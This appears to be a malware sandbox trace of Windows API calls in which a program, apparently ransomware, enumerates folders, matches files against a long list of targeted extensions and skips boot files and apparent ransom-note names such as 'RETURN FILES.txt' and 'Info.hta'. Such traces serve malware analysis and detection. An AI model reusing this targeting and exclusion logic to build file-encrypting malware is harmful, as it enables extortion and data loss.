[0045.575] lstrcmpiW (lpString1=".dx", lpString2="log") returned -1 [0045.575] lstrlenW (lpString=".dxf") returned 4 [0045.575] lstrcmpiW (lpString1=".dxf", lpString2=".log") returned -1 [0045.575] lstrlenW (lpString=".edml") returned 5 [0045.575] lstrcmpiW (lpString1=".edml", lpString2="6.log") returned -1 [0045.575] lstrlenW (lpString=".efd") returned 4 [0045.575] lstrcmpiW (lpString1=".efd", lpString2=".log") returned -1 [0045.575] lstrlenW (lpString=".elf") returned 4 [0045.575] lstrcmpiW (lpString1=".elf", lpString2=".log") returned -1 [0045.575] lstrlenW (lpString=".emf") returned 4 [0045.575] lstrcmpiW (lpString1=".emf", lpString2=".log") returned -1 [0045.575] lstrlenW (lpString=".emz") returned 4 [0045.575] lstrcmpiW (lpString1=".emz", lpString2=".log") returned -1 [0045.575] lstrlenW (lpString=".epf") returned 4 [0045.576] lstrcmpiW (lpString1=".epf", lpString2=".log") returned -1 [0045.576] lstrlenW (lpString=".eps") returned 4 [0045.576] lstrcmpiW (lpString1=".eps", lpString2=".log") returned -1 [0045.576] lstrlenW (lpString=".epsf") returned 5 [0045.576] lstrcmpiW (lpString1=".epsf", lpString2="6.log") returned -1 [0045.576] lstrlenW (lpString=".epsp") returned 5 [0045.576] lstrcmpiW (lpString1=".epsp", lpString2="6.log") returned -1 [0045.576] lstrlenW (lpString=".erf") returned 4 [0045.576] lstrcmpiW (lpString1=".erf", lpString2=".log") returned -1 [0045.576] lstrlenW (lpString=".exr") returned 4 [0045.576] lstrcmpiW (lpString1=".exr", lpString2=".log") returned -1 [0045.576] lstrlenW (lpString=".f4v") returned 4 [0045.576] lstrcmpiW (lpString1=".f4v", lpString2=".log") returned -1 [0045.576] lstrlenW (lpString=".fido") returned 5 [0045.576] lstrcmpiW (lpString1=".fido", lpString2="6.log") returned -1 [0045.576] lstrlenW (lpString=".flm") returned 4 [0045.576] lstrcmpiW (lpString1=".flm", lpString2=".log") returned -1 [0045.576] lstrlenW (lpString=".flv") returned 4 [0045.576] lstrcmpiW (lpString1=".flv", lpString2=".log") returned -1 [0045.576] lstrlenW (lpString=".frm") returned 4 [0045.576] lstrcmpiW (lpString1=".frm", lpString2=".log") returned -1 [0045.576] lstrlenW (lpString=".fxg") returned 4 [0045.576] lstrcmpiW (lpString1=".fxg", lpString2=".log") returned -1 [0045.576] lstrlenW (lpString=".geo") returned 4 [0045.576] lstrcmpiW (lpString1=".geo", lpString2=".log") returned -1 [0045.576] lstrlenW (lpString=".gif") returned 4 [0045.576] lstrcmpiW (lpString1=".gif", lpString2=".log") returned -1 [0045.576] lstrlenW (lpString=".grs") returned 4 [0045.576] lstrcmpiW (lpString1=".grs", lpString2=".log") returned -1 [0045.576] lstrlenW (lpString=".gz") returned 3 [0045.576] lstrcmpiW (lpString1=".gz", lpString2="log") returned -1 [0045.576] lstrlenW (lpString=".h") returned 2 [0045.576] lstrcmpiW (lpString1=".h", lpString2="og") returned -1 [0045.576] lstrlenW (lpString=".hdr") returned 4 [0045.576] lstrcmpiW (lpString1=".hdr", lpString2=".log") returned -1 [0045.577] lstrlenW (lpString=".hpp") returned 4 [0045.577] lstrcmpiW (lpString1=".hpp", lpString2=".log") returned -1 [0045.577] lstrlenW (lpString=".hta") returned 4 [0045.577] lstrcmpiW (lpString1=".hta", lpString2=".log") returned -1 [0045.577] lstrlenW (lpString=".htc") returned 4 [0045.577] lstrcmpiW (lpString1=".htc", lpString2=".log") returned -1 [0045.577] lstrlenW (lpString=".htm") returned 4 [0045.577] lstrcmpiW (lpString1=".htm", lpString2=".log") returned -1 [0045.577] lstrlenW (lpString=".html") returned 5 [0045.577] lstrcmpiW (lpString1=".html", lpString2="6.log") returned -1 [0045.577] lstrlenW (lpString=".icb") returned 4 [0045.577] lstrcmpiW (lpString1=".icb", lpString2=".log") returned -1 [0045.577] lstrlenW (lpString=".ics") returned 4 [0045.577] lstrcmpiW (lpString1=".ics", lpString2=".log") returned -1 [0045.577] lstrlenW (lpString=".iff") returned 4 [0045.577] lstrcmpiW (lpString1=".iff", lpString2=".log") returned -1 [0045.577] lstrlenW (lpString=".inc") returned 4 [0045.577] lstrcmpiW (lpString1=".inc", lpString2=".log") returned -1 [0045.577] lstrlenW (lpString=".indd") returned 5 [0045.577] lstrcmpiW (lpString1=".indd", lpString2="6.log") returned -1 [0045.577] lstrlenW (lpString=".ini") returned 4 [0045.577] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0045.577] lstrlenW (lpString=".iqy") returned 4 [0045.577] lstrcmpiW (lpString1=".iqy", lpString2=".log") returned -1 [0045.577] lstrlenW (lpString=".j2c") returned 4 [0045.577] lstrcmpiW (lpString1=".j2c", lpString2=".log") returned -1 [0045.577] lstrlenW (lpString=".j2k") returned 4 [0045.577] lstrcmpiW (lpString1=".j2k", lpString2=".log") returned -1 [0045.577] lstrlenW (lpString=".java") returned 5 [0045.577] lstrcmpiW (lpString1=".java", lpString2="6.log") returned -1 [0045.577] lstrlenW (lpString=".jp2") returned 4 [0045.577] lstrcmpiW (lpString1=".jp2", lpString2=".log") returned -1 [0045.577] lstrlenW (lpString=".jpc") returned 4 [0045.577] lstrcmpiW (lpString1=".jpc", lpString2=".log") returned -1 [0045.577] lstrlenW (lpString=".jpe") returned 4 [0045.577] lstrcmpiW (lpString1=".jpe", lpString2=".log") returned -1 [0045.577] lstrlenW (lpString=".jpeg") returned 5 [0045.578] lstrcmpiW (lpString1=".jpeg", lpString2="6.log") returned -1 [0045.578] lstrlenW (lpString=".jpf") returned 4 [0045.578] lstrcmpiW (lpString1=".jpf", lpString2=".log") returned -1 [0045.578] lstrlenW (lpString=".jpg") returned 4 [0045.578] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0045.578] lstrlenW (lpString=".jpx") returned 4 [0045.578] lstrcmpiW (lpString1=".jpx", lpString2=".log") returned -1 [0045.578] lstrlenW (lpString=".js") returned 3 [0045.578] lstrcmpiW (lpString1=".js", lpString2="log") returned -1 [0045.578] lstrlenW (lpString=".jsf") returned 4 [0045.578] lstrcmpiW (lpString1=".jsf", lpString2=".log") returned -1 [0045.578] lstrlenW (lpString=".json") returned 5 [0045.578] lstrcmpiW (lpString1=".json", lpString2="6.log") returned -1 [0045.578] lstrlenW (lpString=".jsp") returned 4 [0045.578] lstrcmpiW (lpString1=".jsp", lpString2=".log") returned -1 [0045.578] lstrlenW (lpString=".kdc") returned 4 [0045.578] lstrcmpiW (lpString1=".kdc", lpString2=".log") returned -1 [0045.578] lstrlenW (lpString=".kmz") returned 4 [0045.578] lstrcmpiW (lpString1=".kmz", lpString2=".log") returned -1 [0045.578] lstrlenW (lpString=".kwm") returned 4 [0045.578] lstrcmpiW (lpString1=".kwm", lpString2=".log") returned -1 [0045.578] lstrlenW (lpString=".lasso") returned 6 [0045.578] lstrcmpiW (lpString1=".lasso", lpString2="66.log") returned -1 [0045.578] lstrlenW (lpString=".lbi") returned 4 [0045.578] lstrcmpiW (lpString1=".lbi", lpString2=".log") returned -1 [0045.578] lstrlenW (lpString=".lgf") returned 4 [0045.578] lstrcmpiW (lpString1=".lgf", lpString2=".log") returned -1 [0045.578] lstrlenW (lpString=".lgp") returned 4 [0045.578] lstrcmpiW (lpString1=".lgp", lpString2=".log") returned -1 [0045.578] lstrlenW (lpString=".log") returned 4 [0045.578] lstrcmpiW (lpString1=".log", lpString2=".log") returned 0 [0045.578] lstrlenW (lpString="downlevel_2017_09_07_02_02_39_766.log") returned 37 [0045.578] lstrlenW (lpString=".bat") returned 4 [0045.578] lstrcmpiW (lpString1=".bat", lpString2=".log") returned -1 [0045.578] lstrlenW (lpString="downlevel_2017_09_07_02_02_39_766.log") returned 37 [0045.578] lstrcmpiW (lpString1="boot.ini", lpString2="downlevel_2017_09_07_02_02_39_766.log") returned -1 [0045.578] lstrcmpiW (lpString1="bootfont.bin", lpString2="downlevel_2017_09_07_02_02_39_766.log") returned -1 [0045.578] lstrcmpiW (lpString1="ntldr", lpString2="downlevel_2017_09_07_02_02_39_766.log") returned 1 [0045.579] lstrcmpiW (lpString1="ntdetect.com", lpString2="downlevel_2017_09_07_02_02_39_766.log") returned 1 [0045.579] lstrcmpiW (lpString1="io.sys", lpString2="downlevel_2017_09_07_02_02_39_766.log") returned 1 [0045.579] lstrcmpiW (lpString1="RETURN FILES.txt", lpString2="downlevel_2017_09_07_02_02_39_766.log") returned 1 [0045.579] lstrcmpiW (lpString1="Info.hta", lpString2="downlevel_2017_09_07_02_02_39_766.log") returned 1 [0045.579] lstrcmpiW (lpString1="hgaibc.exe", lpString2="downlevel_2017_09_07_02_02_39_766.log") returned 1 [0045.579] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 57 [0045.579] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x973abb0f, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x980eecb6, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1774, dwReserved0=0x0, dwReserved1=0x0, cFileName="oobe_2017_09_07_03_08_57_737.log", cAlternateFileName="OOBE_2~1.LOG")) returned 1 [0045.579] lstrlenW (lpString="oobe_2017_09_07_03_08_57_737.log") returned 32 [0045.579] lstrlenW (lpString=".1cd") returned 4 [0045.579] lstrcmpiW (lpString1=".1cd", lpString2=".log") returned -1 [0045.579] lstrlenW (lpString=".3ds") returned 4 [0045.579] lstrcmpiW (lpString1=".3ds", lpString2=".log") returned -1 [0045.579] lstrlenW (lpString=".3fr") returned 4 [0045.579] lstrcmpiW (lpString1=".3fr", lpString2=".log") returned -1 [0045.579] lstrlenW (lpString=".3g2") returned 4 [0045.579] lstrcmpiW (lpString1=".3g2", lpString2=".log") returned -1 [0045.579] lstrlenW (lpString=".3gp") returned 4 [0045.579] lstrcmpiW (lpString1=".3gp", lpString2=".log") returned -1 [0045.579] lstrlenW (lpString=".7z") returned 3 [0045.579] lstrcmpiW (lpString1=".7z", lpString2="log") returned -1 [0045.579] lstrlenW (lpString=".accda") returned 6 [0045.579] lstrcmpiW (lpString1=".accda", lpString2="37.log") returned -1 [0045.579] lstrlenW (lpString=".accdb") returned 6 [0045.579] lstrcmpiW (lpString1=".accdb", lpString2="37.log") returned -1 [0045.579] lstrlenW (lpString=".accdc") returned 6 [0045.579] lstrcmpiW (lpString1=".accdc", lpString2="37.log") returned -1 [0045.579] lstrlenW (lpString=".accde") returned 6 [0045.579] lstrcmpiW (lpString1=".accde", lpString2="37.log") returned -1 [0045.580] lstrlenW (lpString=".accdt") returned 6 [0045.580] lstrcmpiW (lpString1=".accdt", lpString2="37.log") returned -1 [0045.580] lstrlenW (lpString=".accdw") returned 6 [0045.580] lstrcmpiW (lpString1=".accdw", lpString2="37.log") returned -1 [0045.580] lstrlenW (lpString=".adb") returned 4 [0045.580] lstrcmpiW (lpString1=".adb", lpString2=".log") returned -1 [0045.580] lstrlenW (lpString=".adp") returned 4 [0045.580] lstrcmpiW (lpString1=".adp", lpString2=".log") returned -1 [0045.580] lstrlenW (lpString=".ai") returned 3 [0045.580] lstrcmpiW (lpString1=".ai", lpString2="log") returned -1 [0045.580] lstrlenW (lpString=".ai3") returned 4 [0045.580] lstrcmpiW (lpString1=".ai3", lpString2=".log") returned -1 [0045.580] lstrlenW (lpString=".ai4") returned 4 [0045.580] lstrcmpiW (lpString1=".ai4", lpString2=".log") returned -1 [0045.580] lstrlenW (lpString=".ai5") returned 4 [0045.580] lstrcmpiW (lpString1=".ai5", lpString2=".log") returned -1 [0045.580] lstrlenW (lpString=".ai6") returned 4 [0045.580] lstrcmpiW (lpString1=".ai6", lpString2=".log") returned -1 [0045.580] lstrlenW (lpString=".ai7") returned 4 [0045.580] lstrcmpiW (lpString1=".ai7", lpString2=".log") returned -1 [0045.580] lstrlenW (lpString=".ai8") returned 4 [0045.580] lstrcmpiW (lpString1=".ai8", lpString2=".log") returned -1 [0045.580] lstrlenW (lpString=".anim") returned 5 [0045.580] lstrcmpiW (lpString1=".anim", lpString2="7.log") returned -1 [0045.580] lstrlenW (lpString=".arw") returned 4 [0045.580] lstrcmpiW (lpString1=".arw", lpString2=".log") returned -1 [0045.580] lstrlenW (lpString=".as") returned 3 [0045.580] lstrcmpiW (lpString1=".as", lpString2="log") returned -1 [0045.580] lstrlenW (lpString=".asa") returned 4 [0045.581] lstrcmpiW (lpString1=".asa", lpString2=".log") returned -1 [0045.581] lstrlenW (lpString=".asc") returned 4 [0045.581] lstrcmpiW (lpString1=".asc", lpString2=".log") returned -1 [0045.581] lstrlenW (lpString=".ascx") returned 5 [0045.581] lstrcmpiW (lpString1=".ascx", lpString2="7.log") returned -1 [0045.581] lstrlenW (lpString=".asm") returned 4 [0045.581] lstrcmpiW (lpString1=".asm", lpString2=".log") returned -1 [0045.581] lstrlenW (lpString=".asmx") returned 5 [0045.581] lstrcmpiW (lpString1=".asmx", lpString2="7.log") returned -1 [0045.581] lstrlenW (lpString=".asp") returned 4 [0045.581] lstrcmpiW (lpString1=".asp", lpString2=".log") returned -1 [0045.581] lstrlenW (lpString=".aspx") returned 5 [0045.581] lstrcmpiW (lpString1=".aspx", lpString2="7.log") returned -1 [0045.581] lstrlenW (lpString=".asr") returned 4 [0045.581] lstrcmpiW (lpString1=".asr", lpString2=".log") returned -1 [0045.581] lstrlenW (lpString=".asx") returned 4 [0045.581] lstrcmpiW (lpString1=".asx", lpString2=".log") returned -1 [0045.581] lstrlenW (lpString=".avi") returned 4 [0045.581] lstrcmpiW (lpString1=".avi", lpString2=".log") returned -1 [0045.581] lstrlenW (lpString=".avs") returned 4 [0045.581] lstrcmpiW (lpString1=".avs", lpString2=".log") returned -1 [0045.581] lstrlenW (lpString=".backup") returned 7 [0045.581] lstrcmpiW (lpString1=".backup", lpString2="737.log") returned -1 [0045.581] lstrlenW (lpString=".bak") returned 4 [0045.581] lstrcmpiW (lpString1=".bak", lpString2=".log") returned -1 [0045.581] lstrlenW (lpString=".bay") returned 4 [0045.581] lstrcmpiW (lpString1=".bay", lpString2=".log") returned -1 [0045.581] lstrlenW (lpString=".bd") returned 3 [0045.581] lstrcmpiW (lpString1=".bd", lpString2="log") returned -1 [0045.581] lstrlenW (lpString=".bin") returned 4 [0045.581] lstrcmpiW (lpString1=".bin", lpString2=".log") returned -1 [0045.581] lstrlenW (lpString=".bmp") returned 4 [0045.581] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0045.582] lstrlenW (lpString=".bz2") returned 4 [0045.582] lstrcmpiW (lpString1=".bz2", lpString2=".log") returned -1 [0045.582] lstrlenW (lpString=".c") returned 2 [0045.582] lstrcmpiW (lpString1=".c", lpString2="og") returned -1 [0045.582] lstrlenW (lpString=".cdr") returned 4 [0045.582] lstrcmpiW (lpString1=".cdr", lpString2=".log") returned -1 [0045.582] lstrlenW (lpString=".cer") returned 4 [0045.582] lstrcmpiW (lpString1=".cer", lpString2=".log") returned -1 [0045.582] lstrlenW (lpString=".cf") returned 3 [0045.582] lstrcmpiW (lpString1=".cf", lpString2="log") returned -1 [0045.582] lstrlenW (lpString=".cfc") returned 4 [0045.582] lstrcmpiW (lpString1=".cfc", lpString2=".log") returned -1 [0045.582] lstrlenW (lpString=".cfm") returned 4 [0045.582] lstrcmpiW (lpString1=".cfm", lpString2=".log") returned -1 [0045.582] lstrlenW (lpString=".cfml") returned 5 [0045.582] lstrcmpiW (lpString1=".cfml", lpString2="7.log") returned -1 [0045.582] lstrlenW (lpString=".cfu") returned 4 [0045.582] lstrcmpiW (lpString1=".cfu", lpString2=".log") returned -1 [0045.582] lstrlenW (lpString=".chm") returned 4 [0045.582] lstrcmpiW (lpString1=".chm", lpString2=".log") returned -1 [0045.582] lstrlenW (lpString=".cin") returned 4 [0045.582] lstrcmpiW (lpString1=".cin", lpString2=".log") returned -1 [0045.582] lstrlenW (lpString=".class") returned 6 [0045.582] lstrcmpiW (lpString1=".class", lpString2="37.log") returned -1 [0045.582] lstrlenW (lpString=".clx") returned 4 [0045.582] lstrcmpiW (lpString1=".clx", lpString2=".log") returned -1 [0045.583] lstrlenW (lpString=".config") returned 7 [0045.583] lstrcmpiW (lpString1=".config", lpString2="737.log") returned -1 [0045.583] lstrlenW (lpString=".cpp") returned 4 [0045.583] lstrcmpiW (lpString1=".cpp", lpString2=".log") returned -1 [0045.583] lstrlenW (lpString=".cr2") returned 4 [0045.583] lstrcmpiW (lpString1=".cr2", lpString2=".log") returned -1 [0045.583] lstrlenW (lpString=".crt") returned 4 [0045.583] lstrcmpiW (lpString1=".crt", lpString2=".log") returned -1 [0045.583] lstrlenW (lpString=".crw") returned 4 [0045.583] lstrcmpiW (lpString1=".crw", lpString2=".log") returned -1 [0045.583] lstrlenW (lpString=".cs") returned 3 [0045.583] lstrcmpiW (lpString1=".cs", lpString2="log") returned -1 [0045.583] lstrlenW (lpString=".css") returned 4 [0045.583] lstrcmpiW (lpString1=".css", lpString2=".log") returned -1 [0045.583] lstrlenW (lpString=".csv") returned 4 [0045.583] lstrcmpiW (lpString1=".csv", lpString2=".log") returned -1 [0045.583] lstrlenW (lpString=".cub") returned 4 [0045.583] lstrcmpiW (lpString1=".cub", lpString2=".log") returned -1 [0045.583] lstrlenW (lpString=".dae") returned 4 [0045.583] lstrcmpiW (lpString1=".dae", lpString2=".log") returned -1 [0045.583] lstrlenW (lpString=".dat") returned 4 [0045.583] lstrcmpiW (lpString1=".dat", lpString2=".log") returned -1 [0045.583] lstrlenW (lpString=".db") returned 3 [0045.583] lstrcmpiW (lpString1=".db", lpString2="log") returned -1 [0045.583] lstrlenW (lpString=".dbf") returned 4 [0045.583] lstrcmpiW (lpString1=".dbf", lpString2=".log") returned -1 [0045.583] lstrlenW (lpString=".dbx") returned 4 [0045.583] lstrcmpiW (lpString1=".dbx", lpString2=".log") returned -1 [0045.583] lstrlenW (lpString=".dc3") returned 4 [0045.583] lstrcmpiW (lpString1=".dc3", lpString2=".log") returned -1 [0045.583] lstrlenW (lpString=".dcm") returned 4 [0045.583] lstrcmpiW (lpString1=".dcm", lpString2=".log") returned -1 [0045.583] lstrlenW (lpString=".dcr") returned 4 [0045.584] lstrcmpiW (lpString1=".dcr", lpString2=".log") returned -1 [0045.584] lstrlenW (lpString=".der") returned 4 [0045.584] lstrcmpiW (lpString1=".der", lpString2=".log") returned -1 [0045.584] lstrlenW (lpString=".dib") returned 4 [0045.584] lstrcmpiW (lpString1=".dib", lpString2=".log") returned -1 [0045.584] lstrlenW (lpString=".dic") returned 4 [0045.584] lstrcmpiW (lpString1=".dic", lpString2=".log") returned -1 [0045.584] lstrlenW (lpString=".dif") returned 4 [0045.584] lstrcmpiW (lpString1=".dif", lpString2=".log") returned -1 [0045.584] lstrlenW (lpString=".divx") returned 5 [0045.584] lstrcmpiW (lpString1=".divx", lpString2="7.log") returned -1 [0045.584] lstrlenW (lpString=".djvu") returned 5 [0045.584] lstrcmpiW (lpString1=".djvu", lpString2="7.log") returned -1 [0045.584] lstrlenW (lpString=".dng") returned 4 [0045.584] lstrcmpiW (lpString1=".dng", lpString2=".log") returned -1 [0045.584] lstrlenW (lpString=".doc") returned 4 [0045.584] lstrcmpiW (lpString1=".doc", lpString2=".log") returned -1 [0045.584] lstrlenW (lpString=".docm") returned 5 [0045.584] lstrcmpiW (lpString1=".docm", lpString2="7.log") returned -1 [0045.584] lstrlenW (lpString=".docx") returned 5 [0045.584] lstrcmpiW (lpString1=".docx", lpString2="7.log") returned -1 [0045.584] lstrlenW (lpString=".dot") returned 4 [0045.584] lstrcmpiW (lpString1=".dot", lpString2=".log") returned -1 [0045.584] lstrlenW (lpString=".dotm") returned 5 [0045.584] lstrcmpiW (lpString1=".dotm", lpString2="7.log") returned -1 [0045.584] lstrlenW (lpString=".dotx") returned 5 [0045.584] lstrcmpiW (lpString1=".dotx", lpString2="7.log") returned -1 [0045.584] lstrlenW (lpString=".dpx") returned 4 [0045.584] lstrcmpiW (lpString1=".dpx", lpString2=".log") returned -1 [0045.584] lstrlenW (lpString=".dqy") returned 4 [0045.584] lstrcmpiW (lpString1=".dqy", lpString2=".log") returned -1 [0045.585] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c5a0a89, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xbb3747bd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x0, dwReserved1=0x0, cFileName="PartnerSetupCompleteResult.log", cAlternateFileName="PARTNE~1.LOG")) returned 1 [0045.585] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c5a0a89, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xbb3747bd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x0, dwReserved1=0x0, cFileName="PartnerSetupCompleteResult.log", cAlternateFileName="PARTNE~1.LOG")) returned 0 [0045.585] FindClose (in: hFindFile=0x42602c8 | out: hFindFile=0x42602c8) returned 1 [0045.586] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.586] FindNextFileW (in: hFindFile=0x5e9a18, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SafeOS", cAlternateFileName="")) returned 1 [0045.587] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4240048 [0045.587] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\SafeOS\\*", lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260708 [0045.678] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.678] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9568f13f, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9568f13f, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x232c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="GetCurrentOOBE.dll", cAlternateFileName="GETCUR~1.DLL")) returned 1 [0045.679] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956819aa, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x956819aa, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x980eecb6, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x9c, dwReserved0=0x0, dwReserved1=0x0, cFileName="GetCurrentRollback.ini", cAlternateFileName="GETCUR~1.INI")) returned 1 [0045.679] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x54acc791, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0x54acc791, ftLastWriteTime.dwHighDateTime=0x1d3273a, nFileSizeHigh=0x0, nFileSizeLow=0x241, dwReserved0=0x0, dwReserved1=0x0, cFileName="PartnerSetupComplete.cmd", cAlternateFileName="PARTNE~1.CMD")) returned 1 [0045.679] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9575af11, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9577d1ec, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="preoobe.cmd", cAlternateFileName="")) returned 1 [0045.679] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957833a7, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9578472e, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x133, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupComplete.cmd", cAlternateFileName="SETUPC~1.CMD")) returned 1 [0045.679] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957833a7, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9578472e, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x133, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupComplete.cmd", cAlternateFileName="SETUPC~1.CMD")) returned 0 [0045.679] FindClose (in: hFindFile=0x4260708 | out: hFindFile=0x4260708) returned 1 [0045.680] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.680] FindNextFileW (in: hFindFile=0x5e9a18, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SafeOS", cAlternateFileName="")) returned 0 [0045.680] FindClose (in: hFindFile=0x5e9a18 | out: hFindFile=0x5e9a18) returned 1 [0045.680] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3c00050 | out: hHeap=0x5d0000) returned 1 [0045.681] FindNextFileW (in: hFindFile=0x5e9918, lpFindFileData=0x2e4fcf8 | out: lpFindFileData=0x2e4fcf8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77bb0000, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 1 [0045.682] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3c00050 [0045.682] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", 